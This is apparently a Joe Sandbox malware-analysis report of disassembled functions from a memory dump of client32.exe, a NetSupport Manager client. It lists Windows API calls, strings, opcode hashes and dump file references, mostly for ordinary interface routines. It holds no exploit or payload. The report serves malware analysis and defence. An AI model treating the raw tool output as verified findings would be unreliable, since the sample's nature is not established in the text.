Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageWindow$BeepErrorExitInvalidateLastProcessRectUpdatewsprintf
String ID: NSMStatsWindow Read %d and %d (previous %d)$NSMStatsWindow Add value %d$NSMStatsWindow::OnTimer$e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
API String ID: 490496107-2775872530
Opcode ID: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
Instruction ID: d3d90aad3bca8c51e092343d299df36488d3ee70d707c240b8c59d5b32e4b979
Opcode Fuzzy Hash: d9e39ef12bae1f0dabfce1c2349acdb44f901fd7f2055dc060b1669aa1c7fefe
Instruction Fuzzy Hash: 1D3114B9A5031ABFD710CB91CC81FAAF3B8AB84718F104529F566A76C4DA70B900CB52

Function 110416A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 108librarythreadCOMMON

Download Yara Rule

APIs

GetClassNameA.USER32(?,?,00000080), ref: 110416E7
GetWindowThreadProcessId.USER32(?,?), ref: 11041719
OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 11041734
LoadLibraryA.KERNEL32(psapi.dll), ref: 11041749

Part of subcall function 110262F0: GetProcAddress.KERNEL32(00000000,GetProcessImageFileNameA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026306
Part of subcall function 110262F0: K32GetProcessImageFileNameA.KERNEL32(?,00000000,11030983,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026322
Part of subcall function 110262F0: GetProcAddress.KERNEL32(?,GetModuleFileNameExA,00000000,?,?,?,11030983,00000000,?,00000208), ref: 11026336

CloseHandle.KERNEL32(00000000), ref: 110417DD
FreeLibrary.KERNEL32(?), ref: 110417EE

Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E

Strings

pcinssui.exe, xrefs: 110417B9
psapi.dll, xrefs: 11041744
NSSWControl32, xrefs: 110416F3

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Process$AddressLibraryNameProc$ClassCloseFileFreeHandleImageLoadOpenThreadWindow_strrchr
String ID: NSSWControl32$pcinssui.exe$psapi.dll
API String ID: 2388757878-1455766584
Opcode ID: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
Instruction ID: 52c903991e8a4b03fd7171fe37ee29b83fe9f1de1022b00e10817fd4b2db0e2c
Opcode Fuzzy Hash: 5f146f9da64c4dccdfb278daa74c9d8ed5af3ff81ea7aaf1d32a0e06f673e47e
Instruction Fuzzy Hash: 4E411A75E412299FEB10CF65CC94BEAFBB8FB09304F5045E9E91993640D770AA848F50

Function 11023470 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 85COMMON

Download Yara Rule

APIs

GetWindowTextLengthA.USER32 ref: 11023491
GetDlgItem.USER32(00000000,000013AB), ref: 110234D4
ShowWindow.USER32(00000000), ref: 110234D7
GetDlgItem.USER32(00000000,000013AB), ref: 11023521
ShowWindow.USER32(00000000), ref: 11023524

Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
Part of subcall function 11029A70: MessageBoxA.USER32 ref: 11029B13
Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29

GetDlgItem.USER32(00000000,?), ref: 1102356B
EnableWindow.USER32(00000000,00000000), ref: 11023577

Strings

m_hWnd, xrefs: 110234B6, 11023503, 11023559
e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h, xrefs: 110234B1, 110234FE, 11023554

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Window$Item$Show$EnableErrorExitLastLengthMessageProcessTextwsprintf
String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\nsmdlg.h$m_hWnd
API String ID: 3823882759-1986719024
Opcode ID: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
Instruction ID: 3a296536204feeda3cf5b5ace87cff4b3db999d64eabd005e2355b496405e70e
Opcode Fuzzy Hash: 6731b4a21ae5097193c9452f6bf6a924e6ae7ca037130a291c3622393df669cb
Instruction Fuzzy Hash: ED214875E04329BFD724CE61CC8AF9EB3A8EB4871CF40C439F62A5A580E674E540CB51

Function 110377F0 Relevance: 15.2, APIs: 10, Instructions: 228COMMON

Download Yara Rule

APIs

GetDlgItemTextA.USER32 ref: 11037824
SelectObject.GDI32(?,?), ref: 11037872
InflateRect.USER32 ref: 110378C6
GetBkColor.GDI32(?), ref: 11037A5C
InflateRect.USER32 ref: 110378F9

Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 111430F4
Part of subcall function 111430E0: ExtTextOutA.GDI32(?,00000000,00000000,00000002,?,00000000,00000000,00000000), ref: 11143109
Part of subcall function 111430E0: SetBkColor.GDI32(?,00000000), ref: 11143111

InflateRect.USER32 ref: 11037923
GetTextExtentPoint32A.GDI32(?,?,?,?), ref: 11037938
DrawTextA.USER32(?,?,?,?,00000410), ref: 11037AC4
DrawTextA.USER32(?,?,?,?,00000010), ref: 11037B37
SelectObject.GDI32(?,00000000), ref: 11037B49

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Text$ColorInflateRect$DrawObjectSelect$ExtentItemPoint32
String ID:
API String ID: 649858571-0
Opcode ID: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
Instruction ID: f09bb6a206b11b6dc813d6ae8b65a0757b728a19553feb9795e3200704aae7d5
Opcode Fuzzy Hash: 8c3c34273943b99b0013a915077c792c96fcf62e4e8e82a874e7d53c05ba55d1
Instruction Fuzzy Hash: A1A159719006299FDB64CF59CC80F9AB7B9FB88314F1086D9E55DA3290EB30AE85CF51

Function 11025480 Relevance: 15.2, APIs: 10, Instructions: 207windowCOMMON

Download Yara Rule

APIs

SetFocus.USER32 ref: 110254CE
GetDlgItem.USER32(?,00001396), ref: 110254E2
CreateCaret.USER32 ref: 11025501
ShowCaret.USER32(00000000), ref: 11025515
DestroyCaret.USER32 ref: 11025529

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Caret$CreateDestroyFocusItemShow
String ID:
API String ID: 3189774202-0
Opcode ID: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
Instruction ID: d774194b0a6d8be079c8d936a3d9a24877d34e73af743b83035fdfa72e7830a2
Opcode Fuzzy Hash: 4efeef9138cc8cf07fe9f319340381759070747349b18f9b79cddb7145ce07d1
Instruction Fuzzy Hash: 1E61D375B002199BE724CF64DC84BEE73E9FB88701F504959F997CB2C0DA76A841C7A8

Function 110351C0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110351E0

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

_memmove.LIBCMT ref: 11035267
_memmove.LIBCMT ref: 1103528B
_memmove.LIBCMT ref: 110352C5
_memmove.LIBCMT ref: 110352E1
std::exception::exception.LIBCMT ref: 1103532B
__CxxThrowException@8.LIBCMT ref: 11035340

Strings

deque<T> too long, xrefs: 110351DB

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
Instruction ID: 821c9d64e9829e99cd7e27c5d42d77d1d91c6fa62e2a3a65c26b72f4499baf16
Opcode Fuzzy Hash: 9fd23bf6dac31a49ae45c6df2bf8e53b139aa7f77a234edd96a6a4a66ff4c3c5
Instruction Fuzzy Hash: 714175B6E101059FDB04CEA8CC81AAEB7FAABD4215F19C569E809D7344EA75EA01C790

Function 11019350 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 11019370

Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612AE
Part of subcall function 11161299: __CxxThrowException@8.LIBCMT ref: 111612C3
Part of subcall function 11161299: std::exception::exception.LIBCMT ref: 111612D4

_memmove.LIBCMT ref: 110193F7
_memmove.LIBCMT ref: 1101941B
_memmove.LIBCMT ref: 11019455
_memmove.LIBCMT ref: 11019471
std::exception::exception.LIBCMT ref: 110194BB
__CxxThrowException@8.LIBCMT ref: 110194D0

Strings

deque<T> too long, xrefs: 1101936B

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove$std::exception::exception$Exception@8Throw$Xinvalid_argumentstd::_
String ID: deque<T> too long
API String ID: 827257264-309773918
Opcode ID: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
Instruction ID: 6a0b8da8f8671f5151ad1a9c663becfdb7ffb53f3c5f022c538811db2e8c78d4
Opcode Fuzzy Hash: bae61be491e2bb3249092c57a3b297af750743dd0981f067cd33e8b54ce2a0b4
Instruction Fuzzy Hash: C54168B6E001159BDB04CE68CC81AAEF7F9AF94318F19C569D809DB349FA75EA01C790

Function 111194B0 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 153COMMON

Download Yara Rule

APIs

Part of subcall function 11113040: GetClientRect.USER32(?,?,?,?,75097D2F,?,?,?,?,11119CBE,00000000), ref: 1111306A

GetWindowRect.USER32(?,?), ref: 111194E1
MapWindowPoints.USER32 ref: 111194FA
GetClientRect.USER32(?,?), ref: 11119508
GetScrollRange.USER32(?,00000000,?,?), ref: 11119549
GetSystemMetrics.USER32(00000003), ref: 11119559
GetScrollRange.USER32(?,00000001,?,00000000), ref: 1111956C
GetSystemMetrics.USER32(00000002), ref: 11119576

Strings

GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d, xrefs: 111195BC

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Rect$ClientMetricsRangeScrollSystemWindow$Points
String ID: GetParentDims, wl=%d,wt=%d,wr=%d,wb=%d, cl=%d,ct=%d,cr=%d,cb=%d, dl=%d,dt=%d,dr=%d,db=%d
API String ID: 4172599486-2052393828
Opcode ID: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
Instruction ID: 912fb1d3c2cdad7c34c8054a8beb9bd8394091149dbdaf68818a53be5a6566d8
Opcode Fuzzy Hash: 25663d0ab3fb6dd7e3eee4b612ed1c5879d89d1bfa55b3a52e18faf4dfa943c1
Instruction Fuzzy Hash: E051F8B1900609AFDB14CFA8C980BEEFBF9FF88314F104569E526A7244D774A941CF60

Function 11009740 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 148fileCOMMON

Download Yara Rule

APIs

Part of subcall function 110B7DF0: GetModuleHandleA.KERNEL32(kernel32.dll,ProcessIdToSessionId,00000000,00000000), ref: 110B7E16
Part of subcall function 110B7DF0: GetProcAddress.KERNEL32(00000000), ref: 110B7E1D
Part of subcall function 110B7DF0: GetCurrentProcessId.KERNEL32(00000000), ref: 110B7E33

wsprintfA.USER32 ref: 1100977F
wsprintfA.USER32 ref: 11009799
CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 11009883

Strings

%s%s.htm, xrefs: 11009793
ApprovedWebList, xrefs: 11009788
Store\, xrefs: 11009820
.%u, xrefs: 11009779

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: wsprintf$AddressCreateCurrentFileHandleModuleProcProcess
String ID: %s%s.htm$.%u$ApprovedWebList$Store\
API String ID: 559337438-1872371932
Opcode ID: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
Instruction ID: 771b4b075f664bf931435fe457300570bff5ff9721ddd3c1a78cab015962a136
Opcode Fuzzy Hash: 75e124715683d0050a8ee82640661044f3f240f0669dfaf61e393b75286c4924
Instruction Fuzzy Hash: 4351D331E0025E9FEB15CF689C91BDABBE4AF09344F4441E5D99DEB341FA309A49CB90

Function 11025320 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 128windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 11025351

Part of subcall function 11025000: SendMessageA.USER32(?,0000000E,00000000,00000000), ref: 11025036
Part of subcall function 11025000: SendMessageA.USER32(?,000000BA,00000000,00000000), ref: 11025049
Part of subcall function 11025000: SendMessageA.USER32(?,000000BB,-00000001,00000000), ref: 1102505A
Part of subcall function 11025000: SendMessageA.USER32(?,000000C1,00000000,00000000), ref: 11025065
Part of subcall function 11025000: SendMessageA.USER32(?,000000C4,-00000001,?), ref: 1102507E
Part of subcall function 11025000: GetDC.USER32(?), ref: 11025085
Part of subcall function 11025000: SendMessageA.USER32(?,00000031,00000000,00000000), ref: 11025095
Part of subcall function 11025000: SelectObject.GDI32(?,00000000), ref: 110250A2
Part of subcall function 11025000: GetTextExtentPoint32A.GDI32(?,00000020,00000001,?), ref: 110250B8
Part of subcall function 11025000: SelectObject.GDI32(?,?), ref: 110250C7
Part of subcall function 11025000: ReleaseDC.USER32(?,?), ref: 110250CF

SendMessageA.USER32(00000000,000000C1,00000000,00000000), ref: 110253C9
SendMessageA.USER32(00000000,000000B1,00000000,-00000002), ref: 110253DA
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 110253E8
SendMessageA.USER32(00000000,0000000E,00000000,00000000), ref: 110253F1
SendMessageA.USER32(00000000,000000B1,?,?), ref: 11025425
SendMessageA.USER32(00000000,000000C2,00000000,00000000), ref: 11025433

Strings

8, xrefs: 110253A9

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessageSend$ObjectSelect$ExtentItemPoint32ReleaseText
String ID: 8
API String ID: 762489935-4194326291
Opcode ID: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
Instruction ID: 930c0c8f097ea1a0c561faf68991d79795fa3a28e1f50edb77ad2a2483817317
Opcode Fuzzy Hash: 6d55198dcb8903f7cb199ecb074005425c4f27be9449354806f6e1afde77a9a3
Instruction Fuzzy Hash: B6419471E01219AFDB14DFA4CC41FEEB7B8EF48705F508169F906E6180DBB5AA40CB69

Function 11005210 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 104windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 1100521E
_memset.LIBCMT ref: 11005240
GetMenuItemID.USER32(?,00000000), ref: 11005254
CheckMenuItem.USER32 ref: 110052B1
EnableMenuItem.USER32 ref: 110052C7
GetMenuItemInfoA.USER32 ref: 110052E8
SetMenuItemInfoA.USER32 ref: 11005314

Strings

0, xrefs: 1100524D

Memory Dump Source

Source File: 00000004.00000002.670925728.0000000011001000.00000020.00000001.01000000.00000009.sdmp, Offset: 11000000, based on PE: true

Associated: 00000004.00000002.670920853.0000000011000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670958515.0000000011194000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670970970.00000000111E2000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670976452.00000000111F1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000111F7000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001125D000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.0000000011288000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001129E000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112AD000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112B4000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.00000000112DF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000004.00000002.670983083.000000001132B000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: ItemMenu$Info$CheckCountEnable_memset
String ID: 0
API String ID: 2755257978-4108050209
Opcode ID: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
Instruction ID: 3498b13fe94e5af900cf0a89c9b181a4bb2b9f9614c8d31ca7af4f255d02c70f
Opcode Fuzzy Hash: 64426ca387f460fb7a01fd0aca5c54c25300771ffc0ff337154cefcaf6503ee4
Instruction Fuzzy Hash: AB31A170D41219ABEB01DFA4C988BDEBBFCEF46398F008059F851EB250D7B59A44CB60

